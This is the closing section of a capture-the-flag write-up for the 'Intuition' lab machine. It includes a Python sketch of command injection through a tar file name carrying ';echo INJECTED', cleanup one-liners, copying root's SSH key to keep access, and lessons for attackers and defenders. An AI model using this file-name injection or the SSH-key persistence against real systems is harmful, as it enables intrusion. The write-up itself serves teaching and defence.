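My understanding of why this works: the program validates the file using the literal path (semicolon included), but then pastes that same string into a shell command, where the semicolon becomes a command separator. The sketch below reproduces the idea harmlessly in a temporary directory. The echo command is a stand-in, since I’m not reproducing runner2’s real command string here.

```python
import os
import subprocess
import tarfile
import tempfile

def demo():
    """Create a valid tar whose *name* carries a shell payload, then 'install' it."""
    with tempfile.TemporaryDirectory() as tmp:
        inner = os.path.join(tmp, "nothing.txt")
        with open(inner, "w") as fh:
            fh.write("Hello world\n")
        # The filename itself ends in ';echo INJECTED'
        tar_path = os.path.join(tmp, "nothing.tar;echo INJECTED")
        with tarfile.open(tar_path, "w") as tar:
            tar.add(inner, arcname="nothing.txt")
        # Step 1: validation on the literal path succeeds
        is_valid = tarfile.is_tarfile(tar_path)
        # Step 2: unquoted interpolation into a shell command (stand-in command)
        out = subprocess.run("echo installing " + tar_path, shell=True,
                             capture_output=True, text=True).stdout
        return is_valid, out

is_valid, out = demo()
print(is_valid)
print(out)
```

Quoting the path before building the command, or avoiding the shell entirely by passing an argument list, would neutralize the payload.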

🤠 We did it! That was a tough box!

The root flag is exactly where you’d expect it, at /root/root.txt. Just cat it out for those well-earned points.

CLEANUP

Target



I’ll get rid of the spot where I place my tools, /tmp/.Tools:

rm -rf /tmp/.Tools

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

rm -rf werkzeug-hash-cracker

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

During this box I also added the private key that was found to my SSH agent. Best to delete it, to save from cluttering up my machine:

ssh-add -d loot/private-8297.key

EXTRA CREDIT

Taking the SSH Key

Since I just cleaned up my exploit from the target’s filesystem, I wanted a way to be able to get back in. For example, maybe I forgot to document something, and wanted to log back in to take a screenshot?



Conveniently, the root user has an RSA key already:

It’s truly as simple as copy-pasting that key over to the attacker machine, then setting 600 permissions on it:

Server configuration

It’s totally unnecessary, but I was personally interested in how the Werkzeug + Flask server worked, and how it was containerized. The whole setup can be found in /root/scripts/docker:

- Dockerfile

- docker-compose.yml

- requirements.txt

Cleanup scripts

The cleanup scripts were extra annoying on this box, so I wanted to see what all it was doing. The details are in /root/scripts/cleanup/cleanup.sh:

#!/bin/sh

/usr/bin/rm -r /opt/ftp/ftp_admin/*

/usr/bin/cp -r /root/scripts/cleanup/ftp_admin/* /opt/ftp/ftp_admin/

/usr/bin/rm -r /var/www/app/blueprints/dashboard/pdf_reports/*

/usr/bin/rm /var/www/app/blueprints/auth/users.db

/usr/bin/cp /root/scripts/cleanup/users.db /var/www/app/blueprints/auth/users.db

#/usr/bin/rm /var/www/app/blueprints/report/reports.db

#/usr/bin/cp /root/scripts/cleanup/reports.db /var/www/app/blueprints/report/reports.db

LESSONS LEARNED

Attacker

♻️ Boxes that rely on XSS mechanisms seem to need more resets than most. This box was no exception. I had to do half a dozen resets to finish this one. I wasted hours on the XSS step because I thought my attempts were flawed - it turned out that I had been doing it perfectly and the box just needed a reset!

📚 Fingerprint, research, repeat. A huge part of penetration testing is being methodical. When I discovered the exact version of python and urllib that the web app was using, a quick search revealed the vulnerability that allowed our SSRF to take place. Any time you find a version number, just quickly research the version number. Even reading the first page or two of search results is often enough.

🔍 Use zgrep if it’s available. A ton of important logs, especially older logs, are stored as gzip-compressed files. Since these can contain sensitive data, it’s very important during enumeration to examine these files too. Using zgrep as a drop-in replacement for grep will allow you to gain visibility over compressed data without any change to your current workflow.

🕶️ The SSH agent itself will happily divulge the username of looted private keys. It’s not really an advertised feature, but it’s a really nice side-effect. If you’ve obtained some private keys but don’t know the username associated with them, just add them to your SSH agent!

📄 In Linux, everything is a file. Don’t rule out that filenames can contain command injection. It’s crazy that filenames are much more lax than most people realize: they can contain all sorts of special characters, spaces, double extensions, you name it! There’s an asymmetry between actual filename rules, and the de-facto filename conventions that exist - use this to your advantage and try some OS command injections.

↪️ Know when you’ve done enough RE. It’s easy to accidentally go way too far with reverse engineering. On this box, once I realized that the system() call inside runner2 only requires a “valid” tar archive, I happily stopped caring about the tar contents themselves. There was no reason to investigate the checks around the inside of the tar file, because once the file was being parsed, I had already reached the vulnerable line of code 👍

Defender

🙅 Even internally-used tools shouldn’t be fully trusted. On this box, the developer and administrator’s dashboard was vulnerable to really easy XSS. Remember that even the tools used by your technically-minded staff need to have tight security controls. Don’t think of it as mistrust of your staff, think of it as protecting your staff from the abuses of all kinds of external threat actors 🤗

🚨 Keep your codebase monitored for CVEs. Using something like Github will allow you to have pretty good awareness of when newly-disclosed CVEs might affect your code. On Intuition a fairly recent flaw in urllib exposed the web app to a fairly serious SSRF. This could have easily been patched, if the devs were made aware of the CVE’s existence.

🔐 Always use secure protocols. This box relied quite heavily on FTP (not SFTP!), which was a big problem on two occasions: it enabled us to utilize the SSRF by passing credentials within a URL (which would be considered a plaintext, eavesdroppable transmission of credentials), and it enabled us to read the credentials directly out of a login attempt that was recorded in a log file. If you ever find yourself using telnet instead of SSH, using FTP instead of SFTP, HTTP instead of HTTPS, etc… you should have serious misgivings about it!

📵 It’s OK to have stricter rules than the OS. When you’re writing little fiddly programs such as a C program to run ansible playbooks, it’s not like you’re writing kernel code: nobody is going to care if it’s not perfectly POSIX compliant - you’re allowed to set your own rules and be more strict about things like filenames than the OS requires.

Thanks for reading

🤝🤝🤝🤝

@4wayhandshake